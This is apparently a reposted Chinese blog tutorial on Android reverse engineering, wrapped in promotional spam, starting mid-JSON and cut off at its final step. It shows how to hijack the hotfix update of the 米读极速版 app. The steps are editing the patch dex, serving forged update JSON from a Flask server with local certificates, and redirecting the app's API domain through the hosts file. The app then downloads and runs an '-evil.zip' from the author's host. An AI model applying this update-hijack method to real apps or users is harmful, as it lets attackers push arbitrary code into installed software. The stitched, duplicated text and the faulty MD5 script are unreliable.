2024年最全Android逆向分析实例(四)-米读极速版日志植入,四面楚歌的网络安全工程师该何去何从

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

“version”: “66”,
“md5”: “ec8ab28b08261fe73f7c08d0f8c7cae0”
}
]
}
}**


在浏览器中输入url:**<https://apk.1sapp.com/miduspeed_sep_hotfix_1.55.0.0607.1200_002_531.zip>**


会下载一个名为 '**miduspeed\_sep\_hotfix\_1.55.0.0607.1200\_002\_531.zip'** 的压缩包,这个压缩包里就包含着app打补丁或热更新所需要的classes.dex文件。


压缩包文件内容:


![](https://img-blog.csdnimg.cn/img_convert/e0dc768562e94940456da136b66f7783.png)


解压后将**classes.dex**文件用**jadx**打开;(下面会查看MethodPatchEntry类是否被加载到内存中


![](https://img-blog.csdnimg.cn/img_convert/a45068200f3918ef6659c13eda4a9eca.png)


验证该dex文件是否被加载,可以通过dex文件的类是否被加载到内存中来判断!(判断某个类是否被加载,为下文我们在该类的构造函数中插入日志输出语句做铺垫)。


#### 4. Objection查看内存中加载的类


安装objection;



$ pip install objection


附:objection用法学习见:[Frida进阶:内存漫游、hook anywhere、抓包](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)


这里可以用Objection 来查看内存中是否加载了某个类(用frida也可以,但是相对要麻烦些,因为frida要编写脚本,并且加载的类很多,要想全部输出显示必须输出到文件中才好查找目标类)


首先在模拟器中开启frida,frida配置可以转到这篇文章:[Frida框架配置](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)


新建命令行窗口:



$ frida-ps -U #查看所有进程


![](https://img-blog.csdnimg.cn/img_convert/c41d7675a1ab5ae00040d5e740f3d070.png)


 objection注入进程:



$ objection -g com.lechuan.mdwz explore


查看MethodPatchEntry类是否被加载:



$ android hooking search classes MethodPatchEntry


![](https://img-blog.csdnimg.cn/img_convert/5d45139731187874b3edd8e2051bf149.png)


可以看到在内存中搜索到了这个类;


#### 5. 修改classes.dex文件


首先用[apktool](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)将classes.dex文件反编译成smali文件,接下来修改**MethodPatchEntry.smali**文件,加入日志输出语句(尽量写在构造函数中,因为构造函数一定会被调用,而其它函数不一定


![](https://img-blog.csdnimg.cn/img_convert/f592b879ee7f2823e8f9a55e14deea19.png)


修改完后重打包成classes.dex文件,将dex文件和MANIFEST.MF文件压缩,命名为'**miduspeed\_sep\_hotfix\_1.55.0.0607.1200\_002\_531-evil.zip**'。


#### 6. 将修改后的.zip文件提供给app执行


编写midu-server.py



**from flask import Flask,jsonify
import time
app = Flask(__name__)

@app.route(‘/app/getHotFixV2/20’)
#当执行GET https//127.0.0.1/app/getHotFixV2/20 请求时会执行下面的request_server()函数(但是客户端发送的请求是 GET https://api-platform.1sapp.com/app/getHotFixV2/20,怎样在客户端发送这个请求时也执行下面的函数呢?这就要用到下文的hosts),并返回respon里的json数据给app。这里我们首先把刚刚修改的.zip文件上传到自己的服务器上,并将url地址改成我们自己服务器上的.zip文件地址,然后修改文件的length(字节大小)和md5值,最后加上本地的证书
def request_server():
respon = {
“code”: 0,
“message”: “成功”,
“showErr”: 0,
“currentTime”: 1625035561,
“data”: {
“data”: [
{**
**“sid”: 499,
“pkgId”: 505,
“url”: “http://download.lxh2cwl.xyz/miduspeed_sep_hotfix_1.55.0.0607.1200_002_531-evil.zip”,
“length”: 2797,
“name”: “ReadvoiceFix66”,
“version”: “66”,
“md5”: “11b5662257d99005054c05f5f242e826”
}
]
}
}
return jsonify(respon)

app.run(‘0.0.0.0’,
debug=True,
port=443,
ssl_context=(‘localhost/cert.pem’, ‘localhost/key.pem’))** #本地证书


生成本地证书可以看这篇文章:[cert.pem和key.pem文件生成](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb),如果不想自己生成,也可以从这里下载:[localhost.zip](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)


flask学习可以跳转到这:<https://www.w3cschool.cn/flask/flask_routing.html>


生成文件的md5值:MD5.py



**import hashlib
import os

def get_md5(file_path1):
f = open(file_path,‘rb’)
md5_obj = hashlib.md5()
while True:
d = f.read(8096)
if not d:
break
md5_obj.update(d)
hash_code = md5_obj.hexdigest()
f.close()
md5 = str(hash_code).lower()
return md5

if __name__ == “__main__”:
file_path = r’C:\Users\lxh\Desktop\米读极速版\miduspeed_sep_hotfix_1.55.0.0607.1200_002_531-evil.zip’
#修改文件路径
md5 = get_md5(file_path)
print(md5)**


进入到C:\Windows\System32\drivers\etc,修改本地的**hosts**文件:


![](https://img-blog.csdnimg.cn/20210710085255627.png)


这里我们需要将本地的ip与米读极速版的服务器域名 api-platform.1sapp.com 绑定,以便app客户端发出 GET https://api-platform.1sapp.com/app/getHotFixV2/20 请求时相当于 GET https://127.0.0.1/app/getHotFixV2/20,然后本地会返回一个修改后的json数据给客户端,客户端就会根据json中的url地址去我们自己的服务器上下载已经修改过的.zip压缩包。


拓展:


hosts文件的作用:就是将一些常用的网址[域名](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)与其对应的[IP地址](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从[Hosts文件](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)中寻找对应的[IP地址](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb),一旦找到,系统会立即打开对应网页,如果没有找到,则系统会再将网址提交DNS[域名解析](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)服务器进行IP地址的解析。


**域名与IP的关系**:


1. 你要浏览网页需要在整个互联网上找到对方的电脑,那你就需要输入对方的IP才可以访问,比如大家可以在浏览器里输入这个IP地址【14.215.177.39】你们可以看看打开的是不是百度的首页。你靠着IP地址可以访问百度,你输入[https://www.baidu.com](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)也可以上百度,这是什么原理呢?
2. 在早期的时候,上网就是这么麻烦,你想要访问对方的网站,你必须要知道对方的IP,然后在你的浏览器里输入IP地址,然后就可以访问了,但是IP地址是4组数字,记IP地址的难度不亚于背一个陌生人的手机号,于是乎,我们用一串英文字母来代替IP地址,这就是网站域名,比如百度的网站域名就是[https://www.baidu.com](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb),而百度的IP地址就是14.215.177.39,网站域名很好记,而且域名也可以自定义。
3. 但是这里就有一个问题了,你输入的是域名,你的电脑该怎么将他变成IP地址呢?就比如你输入的是[https://www.baidu.com](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb),为什么你的电脑知道对方的IP是14.215.177.39呢?这个东西就是hosts文件,hosts文件就在你的C:\windows\system32\drivers\etc文件夹下,他相当于电脑的电话本,他记录着每一个域名对应的IP地址,当你输入域名而不是IP的时候,他就会在这个电话本里找到对应的域名,然后把他转化成IP地址。


**DNS解析服务器**:


1. 但是这样也有问题,那就是Hosts文件是有限的,就和你不可能拥有这个世界上所有人的电话号码一样。既然我们自己不可能拥有全世界所有人的电话号码,但是我们可以将收集电话号码这个任务交给一个专门来干这个活的人,然后大家想要问电话的时候去他那查一下就可以了。
2. 这就是DNS服务器,DNS服务器有着相当全的域名和IP,当你输入一串网站的时候,这串网站并不会直接访问,而是先将这个网站发送给DNS服务器,DNS服务器帮你把这串网站变成了IP地址,然后返回给你的电脑。


**什么是DNS劫持?**


1. DNS服务器会告诉你A网站的IP是A,B网站的IP是B,那假如你输入的A网站域名,但是他给你B的IP,你是不是就访问到别的网站去了?
2. 既然DNS服务器可以这么玩,我们是不是可以将用户引导到我的网站上?比如你要看个电影,然后你输入了爱奇艺的官网,然后我作为DNS服务器,我把优酷的IP返回给你,最后就是你虽然输入的爱奇艺官网,但是却得到了优酷的IP并访问了优酷的IP,进入了优酷的网站上。


#### 7. 最终步


这里有个坑:米聊极速版app只有在第一次启动时才会下载那个.zip文件(这一点当时困扰了我好久),所以我们首先得重新安装这个app。


1. 新建cmd,准备日志输出



$ adb logcat > E:/midu.txt #保存在E盘根目录下,文件名为midu.txt


2. 运行midu-server.py




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 10
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值